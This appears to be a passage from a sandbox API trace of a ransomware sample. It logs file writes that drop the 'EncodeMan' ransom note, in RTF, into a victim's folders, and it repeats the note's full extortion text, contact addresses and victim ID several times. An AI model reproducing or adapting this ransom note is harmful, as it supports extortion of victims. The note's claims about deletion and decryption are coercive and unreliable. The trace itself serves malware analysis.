information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n;\x08(v", lpUsedDefaultChar=0x0) returned 8717 [0289.185] WriteFile (in: hFile=0x2d4, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.186] CloseHandle (hObject=0x2d4) returned 1 [0289.186] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_HK\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_hk\\#readme_eman#.rtf")) returned 0xffffffff [0289.186] GetLastError () returned 0x2 [0289.186] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_HK\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_hk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0289.189] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.189] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.189] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you 